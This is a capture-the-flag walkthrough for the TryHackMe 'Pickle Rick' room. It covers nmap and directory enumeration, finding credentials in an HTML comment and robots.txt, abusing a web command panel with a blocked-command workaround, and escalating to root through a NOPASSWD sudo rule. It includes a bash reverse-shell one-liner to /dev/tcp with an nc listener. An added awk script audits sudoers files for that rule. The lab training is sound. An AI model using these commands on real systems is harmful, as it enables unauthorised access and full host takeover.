Papadope Course

Pickle Rick - TryHackMe Walkthrough


A Rick and Morty themed CTF requiring web enumeration, command injection exploitation, and privilege escalation to find three secret ingredients.

Room URL: https://tryhackme.com/room/picklerick

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • ffuf / Gobuster
  • Web shell exploitation
  • Reverse shell
  • linPEAS
  • sudo misconfiguration

Step-by-Step Walkthrough

1. Enumeration

Nmap scan:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Findings:

Port  Service  Notes
22    SSH      OpenSSH (Ubuntu)
80    HTTP     Apache web server

2. Web Enumeration

Visit the website at http://<TARGET_IP>. It appears to be a static page about Rick needing help.

Check the page source — you'll find a username in an HTML comment:

<!-- Username: R1ckRul3s -->

3. Directory Discovery

Use ffuf or Gobuster to find hidden files:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://<TARGET_IP>/FUZZ

Or:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt

Found:

  • /robots.txt — Contains a strange string (potential password)
  • /login.php — Login page

4. Check robots.txt

curl http://<TARGET_IP>/robots.txt

This reveals a strange word — this is the password for the login page.


5. Login and Command Panel

Navigate to http://<TARGET_IP>/login.php and log in with:

  • Username: R1ckRul3s
  • Password: (string from robots.txt)

After login, you'll find a Command Panel — this is a web shell!

Test it:

id

You'll see you're running as www-data.


6. Finding the Ingredients

First Ingredient

List files in the current directory:

ls -la

You'll see Sup3rS3cretPickl3Ingred.txt. Some commands like cat are blocked, but you can use:

grep . Sup3rS3cretPickl3Ingred.txt

Or simply navigate to http://<TARGET_IP>/Sup3rS3cretPickl3Ingred.txt in your browser.

Second Ingredient

Check the clue file:

grep . clue.txt

It hints that you should look around the file system. Check Rick's home directory:

ls -la /home/rick

Read the second ingredient:

grep . "/home/rick/second ingredients"

7. Getting a Reverse Shell (Optional)

For easier navigation, get a proper reverse shell.

On your machine:

nc -lvnp 4444

In the command panel:

bash -c "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"

8. Privilege Escalation

Check sudo permissions:

sudo -l

Finding: www-data can run ALL commands as root without a password!

User www-data may run the following commands:
    (ALL) NOPASSWD: ALL

This is a critical misconfiguration: any command execution as the web server account is equivalent to root.
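
To check a host for this rule from the defender's side, the following added example (not part of the original walkthrough or the room) scans sudoers-format text for entries that grant NOPASSWD on the command ALL, including cases where the tag carries over a comma-separated list or a continued line. The function name audit_sudoers and the sample rules are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag sudoers rules that let an
# account run ALL commands as root with no password, as www-data can here.
# On a real host, run as root: audit_sudoers /etc/sudoers /etc/sudoers.d/*

audit_sudoers() {
    # Reads sudoers-format text from the given files, or stdin if none.
    # Prints "<who>: <rule>" for every matching user specification.
    awk '
    /\\$/ { sub(/\\$/, ""); buf = buf $0; next }   # join continued lines
    { line = buf $0; buf = "" }
    line ~ /^[ \t]*$/ || line ~ /^[ \t]*#([^0-9]|$)/ { next }  # blank, comment
    line ~ /^[ \t]*(Defaults|(User|Runas|Host|Cmnd)_Alias)/ { next }
    {
        $0 = line; who = $1; spec = line
        if (!sub(/^[^=]*=/, "", spec)) next        # not a user specification
        # Runas list: absent means root; otherwise it must allow root or ALL.
        if (match(spec, /\([^)]*\)/)) {
            runas = substr(spec, RSTART, RLENGTH)
            spec = substr(spec, 1, RSTART - 1) substr(spec, RSTART + RLENGTH)
            if (runas !~ /ALL|root|#0/) next
        }
        nopass = 0
        n = split(spec, cmd, ",")
        for (i = 1; i <= n; i++) {
            c = cmd[i]
            # A tag such as NOPASSWD: stays in force for later commands.
            while (match(c, /^[ \t]*[A-Z_]+:/)) {
                tag = substr(c, RSTART, RLENGTH); gsub(/[ \t:]/, "", tag)
                if (tag == "NOPASSWD") nopass = 1
                if (tag == "PASSWD") nopass = 0
                c = substr(c, RSTART + RLENGTH)
            }
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            if (nopass && c == "ALL") { print who ": " line; break }
        }
    }' "$@"
}

# Constructed sample rules (not taken from the room).
SAMPLE_SUDOERS='root ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup ALL=(ALL) NOPASSWD: /usr/bin/rsync, \
    ALL
%admin ALL=(ALL) ALL'

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers   # flags www-data and backup
```

A service account such as www-data should have no sudoers entry at all; if one is unavoidable, it should name a single fixed command path rather than ALL.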


9. Third Ingredient (Root Flag)

Escalate to root and find the final ingredient:

sudo ls /root
sudo cat /root/3rd.txt

Or simply:

sudo bash
cd /root
cat 3rd.txt

Summary of Ingredients

#    Location                                   How to Read
1st  /var/www/html/Sup3rS3cretPickl3Ingred.txt  Browser or grep
2nd  /home/rick/second ingredients              grep command
3rd  /root/3rd.txt                              sudo cat

Key Takeaways

  • Always check page source — credentials are often hidden in HTML comments
  • Check robots.txt — may contain sensitive information
  • Command injection — when cat is blocked, try grep, less, head, tail, or direct browser access
  • sudo -l is essential — misconfigured sudo can give instant root
